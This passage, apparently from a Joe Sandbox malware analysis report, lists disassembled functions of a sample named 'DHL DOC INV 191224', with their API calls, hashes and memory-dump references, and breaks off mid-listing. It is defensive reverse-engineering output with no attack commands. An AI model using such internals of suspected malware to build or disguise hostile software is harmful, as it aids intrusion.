                                                                                                                        • Opcode Fuzzy Hash: 26055a12a23f8b9dcb396ba40b76c9a9d051e44a297b115a18e991a0009b607e
                                                                                                                        • Instruction Fuzzy Hash: 0E2151755003059BDF2A9F69DC04E9A77E8FF97724F200A19F9A1E72E0E7709960CB10
                                                                                                                        Function 003C40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0033600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0033604C
                                                                                                                          • Part of subcall function 0033600E: GetStockObject.GDI32(00000011), ref: 00336060
                                                                                                                          • Part of subcall function 0033600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0033606A
                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003C4112
                                                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003C411F
                                                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003C412A
                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003C4139
                                                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003C4145
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                        • String ID: Msctls_Progress32
                                                                                                                        • API String ID: 1025951953-3636473452
                                                                                                                        • Opcode ID: a2e7b312ffc019606bb6fd5fef9a524408aa79c669b6827d426a5ff594df6d8a
                                                                                                                        • Instruction ID: ef6462e361e760809eda076cc7dcc06c785776418d73c9f593e9131d5240f4fb
                                                                                                                        • Opcode Fuzzy Hash: a2e7b312ffc019606bb6fd5fef9a524408aa79c669b6827d426a5ff594df6d8a
                                                                                                                        • Instruction Fuzzy Hash: FC1190B2150219BEEF129F64CC86EE77F9DEF08798F014111FA18E6150C6729C219BA4
                                                                                                                        Function 0036D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0036D7A3: _free.LIBCMT ref: 0036D7CC
                                                                                                                        • _free.LIBCMT ref: 0036D82D
                                                                                                                          • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
                                                                                                                          • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
                                                                                                                        • _free.LIBCMT ref: 0036D838
                                                                                                                        • _free.LIBCMT ref: 0036D843
                                                                                                                        • _free.LIBCMT ref: 0036D897
                                                                                                                        • _free.LIBCMT ref: 0036D8A2
                                                                                                                        • _free.LIBCMT ref: 0036D8AD
                                                                                                                        • _free.LIBCMT ref: 0036D8B8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                                        • Instruction ID: c2a11515930ef6afda84cb06ec0ff2b28c70ed41142b46cb0cecea6bffa084aa
                                                                                                                        • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                                        • Instruction Fuzzy Hash: B5115171B40B04AAD523BFB0CC47FCB7BDC6F42700F448825B299AE096DBA6B5154651
                                                                                                                        Function 0039DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0039DA74
                                                                                                                        • LoadStringW.USER32(00000000), ref: 0039DA7B
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0039DA91
                                                                                                                        • LoadStringW.USER32(00000000), ref: 0039DA98
                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0039DADC
                                                                                                                        Strings
                                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 0039DAB9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleLoadModuleString$Message
                                                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                        • API String ID: 4072794657-3128320259
                                                                                                                        • Opcode ID: 8bb8c7effafcaf27d6e4565b1cf2f0eab070c751c806fda005aa5d79a824726e
                                                                                                                        • Instruction ID: 2b33e3ac8ee7768aa8920214ffbc85c21ea35e44ec9dedc91bb856ca44b66701
                                                                                                                        • Opcode Fuzzy Hash: 8bb8c7effafcaf27d6e4565b1cf2f0eab070c751c806fda005aa5d79a824726e
                                                                                                                        • Instruction Fuzzy Hash: 770186F69102087FEB12ABA49D89EF7336CE708301F445496F74AE2041EA74AE854F74
                                                                                                                        Function 003A096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InterlockedExchange.KERNEL32(00E7E318,00E7E318), ref: 003A097B
                                                                                                                        • EnterCriticalSection.KERNEL32(00E7E2F8,00000000), ref: 003A098D
                                                                                                                        • TerminateThread.KERNEL32(00E7E310,000001F6), ref: 003A099B
                                                                                                                        • WaitForSingleObject.KERNEL32(00E7E310,000003E8), ref: 003A09A9
                                                                                                                        • CloseHandle.KERNEL32(00E7E310), ref: 003A09B8
                                                                                                                        • InterlockedExchange.KERNEL32(00E7E318,000001F6), ref: 003A09C8
                                                                                                                        • LeaveCriticalSection.KERNEL32(00E7E2F8), ref: 003A09CF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3495660284-0
                                                                                                                        • Opcode ID: 6a7db9aaec4c1f98b14ec9bcf86b757a681260d55fb0a13174300eb4b2c360e4
                                                                                                                        • Instruction ID: 4610fb0a3245222a2599ec800cd1d3fa9c1207b3c6b5d5b04b4b2d44b9a5f2fa
                                                                                                                        • Opcode Fuzzy Hash: 6a7db9aaec4c1f98b14ec9bcf86b757a681260d55fb0a13174300eb4b2c360e4
                                                                                                                        • Instruction Fuzzy Hash: D8F01932452A02ABDB465BA4EE8CED6BA39FF02702F402525F206908A0C774A465CF90
                                                                                                                        Function 003601B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __allrem.LIBCMT ref: 003600BA
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003600D6
                                                                                                                        • __allrem.LIBCMT ref: 003600ED
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0036010B
                                                                                                                        • __allrem.LIBCMT ref: 00360122
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00360140
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1992179935-0
                                                                                                                        • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                                        • Instruction ID: 65b1f48eb61d0aa5cd6c7c63b1f7658b71cfacf1c74ba5b0465c3ef8e8350ceb
                                                                                                                        • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                                        • Instruction Fuzzy Hash: 7B8149766007069FE7269F38CC42B6BB3E8AF41720F25863AF851DB691E770D9048B50
                                                                                                                        Function 003661FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,003582D9,003582D9,?,?,?,0036644F,00000001,00000001,8BE85006), ref: 00366258
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0036644F,00000001,00000001,8BE85006,?,?,?), ref: 003662DE
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 003663D8
                                                                                                                        • __freea.LIBCMT ref: 003663E5
                                                                                                                          • Part of subcall function 00363820: RtlAllocateHeap.NTDLL(00000000,?,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6,?,00331129), ref: 00363852
                                                                                                                        • __freea.LIBCMT ref: 003663EE
                                                                                                                        • __freea.LIBCMT ref: 00366413
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1414292761-0
                                                                                                                        • Opcode ID: 8214d981a21ae79543a3d2a7aafdd29badca6bacc941bde5e856a909270c780e
                                                                                                                        • Instruction ID: ef221e313deaedfb21550f715ef4422660298a2be68c2c68106f0310d9e558e6
                                                                                                                        • Opcode Fuzzy Hash: 8214d981a21ae79543a3d2a7aafdd29badca6bacc941bde5e856a909270c780e
                                                                                                                        • Instruction Fuzzy Hash: 0C51D672600216ABDB278F64CC82EBF77A9EF45790F268629FD05DB258DB34DC40C660
                                                                                                                        Function 003BBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                          • Part of subcall function 003BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BB6AE,?,?), ref: 003BC9B5
                                                                                                                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BC9F1
                                                                                                                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA68
                                                                                                                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA9E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003BBCCA
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003BBD25
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 003BBD6A
                                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003BBD99
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003BBDF3
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 003BBDFF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1120388591-0
                                                                                                                        • Opcode ID: 11c262b087d7e949197edee6ce6ca2c70d96c6c2a3c0129de93d3f2c02d2df4d
                                                                                                                        • Instruction ID: fc6f79350383439aa489b4f4e19fb7d627ee3255add851424da7f128fdbba154
                                                                                                                        • Opcode Fuzzy Hash: 11c262b087d7e949197edee6ce6ca2c70d96c6c2a3c0129de93d3f2c02d2df4d
                                                                                                                        • Instruction Fuzzy Hash: 63818C30208241AFD716DF24C891E6ABBE9FF84308F14855CF5998B6A2DF71ED45CB92
                                                                                                                        Function 0038F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(00000035), ref: 0038F7B9
                                                                                                                        • SysAllocString.OLEAUT32(00000001), ref: 0038F860
                                                                                                                        • VariantCopy.OLEAUT32(0038FA64,00000000), ref: 0038F889
                                                                                                                        • VariantClear.OLEAUT32(0038FA64), ref: 0038F8AD
                                                                                                                        • VariantCopy.OLEAUT32(0038FA64,00000000), ref: 0038F8B1
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0038F8BB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3859894641-0
                                                                                                                        • Opcode ID: f43910585786473551dc6adec5591c58ebc60f3f277d79801652f73af845b372
                                                                                                                        • Instruction ID: 73afe11c9b6a47092692a5bfac929a34a898c551e4e4215781a63787432aa4e5
                                                                                                                        • Opcode Fuzzy Hash: f43910585786473551dc6adec5591c58ebc60f3f277d79801652f73af845b372
                                                                                                                        • Instruction Fuzzy Hash: 6E51D331610310FFCF26BB65D895B29B3A8EF45310F2494A7E906DF296DB709C40CBA6
                                                                                                                        Function 003A910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00337620: _wcslen.LIBCMT ref: 00337625
                                                                                                                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                                                                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 003A94E5
                                                                                                                        • _wcslen.LIBCMT ref: 003A9506
                                                                                                                        • _wcslen.LIBCMT ref: 003A952D
                                                                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 003A9585
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$FileName$OpenSave
                                                                                                                        • String ID: X
                                                                                                                        • API String ID: 83654149-3081909835
                                                                                                                        • Opcode ID: 6529b127c03892734193cd57d87794a8b8bd28e0e806511d1119ee4eae6e9fd7
                                                                                                                        • Instruction ID: a41c7d0552c40e9eeedcf4f0e8b70e1f8fc78be0f4fa18fdc296bae8c427ab73
                                                                                                                        • Opcode Fuzzy Hash: 6529b127c03892734193cd57d87794a8b8bd28e0e806511d1119ee4eae6e9fd7
                                                                                                                        • Instruction Fuzzy Hash: 21E181355083409FD726DF24C485B6AB7E4FF86314F05896EF8899B2A2DB31DD05CB92
                                                                                                                        Function 0034920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                                                                                                                        • BeginPaint.USER32(?,?,?), ref: 00349241
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 003492A5
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 003492C2
                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003492D3
                                                                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00349321
                                                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 003871EA
                                                                                                                          • Part of subcall function 00349339: BeginPath.GDI32(00000000), ref: 00349357
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3050599898-0
                                                                                                                        • Opcode ID: aaa98197f0122611f0070b7ed177810fef0827fcbdef6a3cb401b48de2bd82c6
                                                                                                                        • Instruction ID: a1008a1da1d2973f626ae633d51c06c7b062c089c6a9d6b6993074defb043f85
                                                                                                                        • Opcode Fuzzy Hash: aaa98197f0122611f0070b7ed177810fef0827fcbdef6a3cb401b48de2bd82c6
                                                                                                                        • Instruction Fuzzy Hash: 30419F70104300AFD722DF25CC89FAB7BE9EB4A320F14066AF994DB2B1C771A845DB61
                                                                                                                        Function 003A07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 003A080C
                                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 003A0847
                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 003A0863
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 003A08DC
                                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 003A08F3
                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 003A0921
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3368777196-0
                                                                                                                        • Opcode ID: ddcfe28fbae8a268a7d8773fe04c40d6f66188bc15c51f11ceab834a279354ae
                                                                                                                        • Instruction ID: f8a52fc011dcf4564d107c21c18b90b5350d92702f951b1c047642abb960b562
                                                                                                                        • Opcode Fuzzy Hash: ddcfe28fbae8a268a7d8773fe04c40d6f66188bc15c51f11ceab834a279354ae
                                                                                                                        • Instruction Fuzzy Hash: F2416A71900205EFDF1AAF54DC85AAAB7B8FF05300F1440A9ED04DE2A6D734EE65DBA4
                                                                                                                        Function 00394C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsWindowVisible.USER32(?), ref: 00394C95
                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00394CB2
                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00394CEA
                                                                                                                        • _wcslen.LIBCMT ref: 00394D08
                                                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00394D10
                                                                                                                        • _wcsstr.LIBVCRUNTIME ref: 00394D1A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 72514467-0
                                                                                                                        • Opcode ID: b2da63e9004f63504f334c36a2c79b4a7adb5cda22919898a9e7913db04dbd2c
                                                                                                                        • Instruction ID: 25956ae18263185f4a3cbf26e05e8572cd29faee1c1c2f11c25d25c56409d35b
                                                                                                                        • Opcode Fuzzy Hash: b2da63e9004f63504f334c36a2c79b4a7adb5cda22919898a9e7913db04dbd2c
                                                                                                                        • Instruction Fuzzy Hash: 1B21F676604200BFEF175B39AD49E7BBBACDF45750F158029F809CE192EA61DC4297A0
                                                                                                                        Function 003A581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00333AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00333A97,?,?,00332E7F,?,?,?,00000000), ref: 00333AC2
                                                                                                                        • _wcslen.LIBCMT ref: 003A587B
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 003A5995
